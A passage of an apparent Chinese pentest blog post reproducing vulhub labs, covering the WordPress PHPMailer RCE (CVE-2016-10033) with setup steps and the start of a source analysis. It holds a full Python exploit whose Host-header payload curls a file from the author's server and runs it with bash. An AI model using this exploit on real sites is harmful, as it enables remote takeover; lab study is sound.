<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="git地址 https:&#x2F;&#x2F;github.com&#x2F;wupco&#x2F;vulhub.git wordpress-phpmailed-rce 原理 phpmailer代码执行漏洞 https:&#x2F;&#x2F;exploitbox.io&#x2F;vuln&#x2F;WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html 参考:https:&#x2F;&#x2F;www.leavesongs.com&#x2F;PE">
<meta property="og:type" content="article">
<meta property="og:title" content="vulhub复现(大概持续更新)">
<meta property="og:url" content="http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/index.html">
<meta property="og:site_name" content="blacsheep&#39;s blog">
<meta property="og:description" content="git地址 https:&#x2F;&#x2F;github.com&#x2F;wupco&#x2F;vulhub.git wordpress-phpmailed-rce 原理 phpmailer代码执行漏洞 https:&#x2F;&#x2F;exploitbox.io&#x2F;vuln&#x2F;WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html 参考:https:&#x2F;&#x2F;www.leavesongs.com&#x2F;PE">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://example.com/images/2018/07/phpmailedrce.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/phithon-1.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-1.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-2.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-3.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-4.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-5.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-6.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-10.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-11.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-12.png">
<meta property="og:image" content="http://example.com/images/2018/07/vul-14.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-15.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/vul-16.jpg">
<meta property="og:image" content="http://example.com/images/2018/07/2018-09-03-17-34-39%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE.png">
<meta property="article:published_time" content="2018-07-02T12:17:14.000Z">
<meta property="article:modified_time" content="2023-07-10T02:13:29.461Z">
<meta property="article:author" content="blacsheep">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/images/2018/07/phpmailedrce.jpg">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>vulhub复现(大概持续更新)</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
		<script type="text/x-mathjax-config">
		  MathJax.Hub.Config({
			tex2jax: {
			  skipTags: ['script', 'noscript', 'style', 'textarea', 'pre'],
			  inlineMath: [['$','$']]
			}
		  });
		</script>
		<script src='https://cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/latest.js?config=TeX-MML-AM_CHTML' async></script>
	
<!-- hexo injector head_end start -->
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/katex@0.12.0/dist/katex.min.css">

<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hexo-math@4.0.0/dist/style.css">
<!-- hexo injector head_end end --><meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/categories/">Category</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2018/07/03/redis%E5%9C%A8%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E4%B8%ADgetshell%E6%80%BB%E7%BB%93/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2018/07/02/%E8%BD%ACpython%E6%B2%99%E7%9B%92%E9%80%83%E9%80%B8payload%E6%80%BB%E7%BB%93/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&text=vulhub复现(大概持续更新)"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&is_video=false&description=vulhub复现(大概持续更新)"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=vulhub复现(大概持续更新)&body=Check out this article: http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&title=vulhub复现(大概持续更新)"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&name=vulhub复现(大概持续更新)&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://example.com/2018/07/02/vulhub%E5%A4%8D%E7%8E%B0%E5%A4%A7%E6%A6%82%E6%8C%81%E7%BB%AD%E6%9B%B4%E6%96%B0/&t=vulhub复现(大概持续更新)"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#wordpress-phpmailed-rce"><span class="toc-number">1.</span> <span class="toc-text">wordpress-phpmailed-rce</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-number">1.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83"><span class="toc-number">1.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB"><span class="toc-number">1.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.4.</span> <span class="toc-text">分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%86%E6%9E%90patternselect"><span class="toc-number">1.4.1.</span> <span class="toc-text">分析patternselect</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%88%86%E6%9E%90%E6%AD%A3%E5%88%99%E8%A1%A8%E8%BE%BE%E5%BC%8F"><span class="toc-number">1.4.2.</span> <span class="toc-text">分析正则表达式</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#activemq%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9Ecve-2016-3088"><span class="toc-number">2.</span> <span class="toc-text">ActiveMQ任意文件写入漏洞(CVE-2016-3088)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-1"><span class="toc-number">2.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-1"><span class="toc-number">2.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-1"><span class="toc-number">2.3.</span> <span class="toc-text">攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99webshell"><span class="toc-number">2.3.1.</span> <span class="toc-text">写webshell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E5%86%99%E5%85%A5crontab%E8%87%AA%E5%8A%A8%E5%8F%8D%E5%BC%B9shell"><span class="toc-number">2.3.2.</span> <span class="toc-text">写入crontab,自动反弹shell</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-1"><span class="toc-number">2.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#aria2-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E6%BC%8F%E6%B4%9E"><span class="toc-number">3.</span> <span class="toc-text">Aria2 任意文件写入漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-2"><span class="toc-number">3.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-2"><span class="toc-number">3.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-2"><span class="toc-number">3.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-2"><span class="toc-number">3.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#shell%E7%A0%B4%E5%A3%B3%E6%BC%8F%E6%B4%9Ecve-2014-6271"><span class="toc-number">4.</span> <span class="toc-text">Shell破壳漏洞(CVE-2014-6271)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-3"><span class="toc-number">4.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-3"><span class="toc-number">4.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-3"><span class="toc-number">4.3.</span> <span class="toc-text">攻击</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E6%B5%8B%E8%AF%95"><span class="toc-number">4.3.1.</span> <span class="toc-text">本地测试</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E5%88%A9%E7%94%A8"><span class="toc-number">4.3.2.</span> <span class="toc-text">远程利用</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-3"><span class="toc-number">4.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#httpoxy%E6%BC%8F%E6%B4%9Ecve-2016-5385"><span class="toc-number">5.</span> <span class="toc-text">HTTPoxy漏洞(CVE-2016-5385)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-4"><span class="toc-number">5.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-4"><span class="toc-number">5.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-4"><span class="toc-number">5.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-4"><span class="toc-number">5.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#tomcat7%E5%BC%B1%E5%8F%A3%E4%BB%A4%E5%90%8E%E5%8F%B0getshell"><span class="toc-number">6.</span> <span class="toc-text">tomcat7弱口令后台getshell</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-5"><span class="toc-number">6.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-5"><span class="toc-number">6.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-5"><span class="toc-number">6.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-5"><span class="toc-number">6.4.</span> <span class="toc-text">分析</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#cve-2017-12615tomcat%E7%94%A8put%E5%86%99shell"><span class="toc-number">7.</span> <span class="toc-text">CVE-2017-12615(tomcat用PUT写shell)</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-6"><span class="toc-number">7.1.</span> <span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%90%AD%E7%8E%AF%E5%A2%83-6"><span class="toc-number">7.2.</span> <span class="toc-text">搭环境</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%94%BB%E5%87%BB-6"><span class="toc-number">7.3.</span> <span class="toc-text">攻击</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%86%E6%9E%90-6"><span class="toc-number">7.4.</span> <span class="toc-text">分析</span></a></li></ol></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        vulhub复现(大概持续更新)
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">blacsheep</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2018-07-02T12:17:14.000Z" class="dt-published" itemprop="datePublished">2018-07-02</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/pentest/">pentest</a>
    </div>


      

    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>git地址 <a target="_blank" rel="noopener" href="https://github.com/wupco/vulhub.git"
title="https://github.com/wupco/vulhub.git">https://github.com/wupco/vulhub.git</a></p>
<h2 id="wordpress-phpmailed-rce">wordpress-phpmailed-rce</h2>
<h3 id="原理">原理</h3>
<p>phpmailer代码执行漏洞 <a
target="_blank" rel="noopener" href="https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html"
title="https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html">https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html</a>
参考:<a
target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html"
title="https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html">https://www.leavesongs.com/PENETRATION/PHPMailer-CVE-2016-10033.html</a></p>
<h3 id="搭环境">搭环境</h3>
<p>装docker,切目录,然后</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">docker-compose build</span><br><span class="line">docker-compose up -d</span><br></pre></td></tr></table></figure>
<p>然后上站点自己配一下账号就可以了</p>
<h3 id="攻击">攻击</h3>
<p>也没啥好说的,脚本给出了,vps上建个文件,然后监听 攻击机执行exp
然后拿到目标机shell <img src="/images/2018/07/phpmailedrce.jpg"
alt="blacsheep" /> payload改造版</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># wordpress&#x27;s url</span></span><br><span class="line">target = <span class="string">&#x27;http://192.168.188.128/&#x27;</span></span><br><span class="line"><span class="comment"># Put your command in a website, and use the website&#x27;s url</span></span><br><span class="line"><span class="comment"># don&#x27;t contains &quot;http://&quot;, must be all lowercase</span></span><br><span class="line">shell_url = <span class="string">&#x27;blog.blacsheep.cn/xxx&#x27;</span></span><br><span class="line"><span class="comment"># an exists user</span></span><br><span class="line">user = <span class="string">&#x27;admin&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">generate_command</span>(<span class="params">command</span>):</span><br><span class="line">    command = <span class="string">&#x27;$&#123;run&#123;%s&#125;&#125;&#x27;</span> % command</span><br><span class="line">    command = command.replace(<span class="string">&#x27;/&#x27;</span>, <span class="string">&#x27;$&#123;substr&#123;0&#125;&#123;1&#125;&#123;$spool_directory&#125;&#125;&#x27;</span>)</span><br><span class="line">    command = command.replace(<span class="string">&#x27; &#x27;</span>, <span class="string">&#x27;$&#123;substr&#123;10&#125;&#123;1&#125;&#123;$tod_log&#125;&#125;&#x27;</span>)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;target(any -froot@localhost -be %s null)&#x27;</span> % command</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">data = &#123;</span><br><span class="line">    <span class="string">&#x27;user_login&#x27;</span>: user,</span><br><span class="line">    <span class="string">&#x27;redirect_to&#x27;</span>: <span class="string">&#x27;&#x27;</span>,</span><br><span class="line">    <span class="string">&#x27;wp-submit&#x27;</span>: <span class="string">&#x27;Get New Password&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">headers = &#123;</span><br><span class="line">    <span class="string">&#x27;Host&#x27;</span>: generate_command(<span class="string">&#x27;/usr/bin/curl -o/tmp/rce &#x27;</span> + shell_url),</span><br><span class="line">    <span class="string">&#x27;User-Agent&#x27;</span>: <span class="string">&#x27;Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">proxies = &#123;</span><br><span class="line">    <span class="string">&#x27;http&#x27;</span>: <span class="string">&#x27;http://127.0.0.1:8080&#x27;</span></span><br><span class="line">&#125;</span><br><span class="line">target += <span class="string">&#x27;/wp-login.php?action=lostpassword&#x27;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment"># requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)</span></span><br><span class="line"><span class="comment"># headers[&#x27;Host&#x27;] = generate_command(&#x27;/bin/bash /tmp/rce&#x27;)</span></span><br><span class="line"><span class="comment"># requests.post(target, headers=headers, data=data, proxies=proxies, allow_redirects=False)</span></span><br><span class="line"></span><br><span class="line">requests.post(target, headers=headers, data=data, allow_redirects=<span class="literal">False</span>)</span><br><span class="line">headers[<span class="string">&#x27;Host&#x27;</span>] = generate_command(<span class="string">&#x27;/bin/bash /tmp/rce&#x27;</span>)</span><br><span class="line">requests.post(target, headers=headers, data=data, allow_redirects=<span class="literal">False</span>)</span><br></pre></td></tr></table></figure>
<h3 id="分析">分析</h3>
<p>参考phithon师傅的博客
首先这个rce也是由mail函数的第五个参数导致的,mail函数最终调用系统的sendmail发送邮件,而sendmail支持-X参数,这个参数可以将日志写入文件,也就可以写shell了
<img src="/images/2018/07/phithon-1.jpg" alt="blacsheep" />
不过这里不支持shell语法,phpmailed调用的时候也会进行检测,代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment">     * Check that a string looks like an email address.</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> string $address The email address to check</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@param</span> stringcallable $patternselect A selector for the validation pattern to use :</span></span><br><span class="line"><span class="comment">     * * `auto` Pick best pattern automatically;</span></span><br><span class="line"><span class="comment">     * * `pcre8` Use the squiloople.com pattern, requires PCRE &gt; 8.0, PHP &gt;= 5.3.2, 5.2.14;</span></span><br><span class="line"><span class="comment">     * * `pcre` Use old PCRE implementation;</span></span><br><span class="line"><span class="comment">     * * `php` Use PHP built-in FILTER_VALIDATE_EMAIL;</span></span><br><span class="line"><span class="comment">     * * `html5` Use the pattern given by the HTML5 spec for &#x27;email&#x27; type form input elements.</span></span><br><span class="line"><span class="comment">     * * `noregex` Don&#x27;t use a regex: super fast, really dumb.</span></span><br><span class="line"><span class="comment">     * Alternatively you may pass in a callable to inject your own validator, for example:</span></span><br><span class="line"><span class="comment">     * PHPMailer::validateAddress(&#x27;user<span class="doctag">@example</span>.com&#x27;, function($address) &#123;</span></span><br><span class="line"><span class="comment">     *     return (strpos($address, &#x27;@&#x27;) !== false);</span></span><br><span class="line"><span class="comment">     * &#125;);</span></span><br><span class="line"><span class="comment">     * You can also set the PHPMailer::$validator static to a callable, allowing built-in methods to use your validator.</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@return</span> boolean</span></span><br><span class="line"><span class="comment">     * <span class="doctag">@static</span></span></span><br><span class="line"><span class="comment">     * <span class="doctag">@access</span> public</span></span><br><span class="line"><span class="comment">     */</span></span><br><span class="line">    <span class="keyword">public</span> <span class="built_in">static</span> <span class="function"><span class="keyword">function</span> <span class="title">validateAddress</span>(<span class="params"><span class="variable">$address</span>, <span class="variable">$patternselect</span> = <span class="literal">null</span></span>)</span></span><br><span class="line"><span class="function">    </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">is_null</span>(<span class="variable">$patternselect</span>)) &#123;</span><br><span class="line">            <span class="variable">$patternselect</span> = <span class="built_in">self</span>::<span class="variable">$validator</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">is_callable</span>(<span class="variable">$patternselect</span>)) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="title function_ invoke__">call_user_func</span>(<span 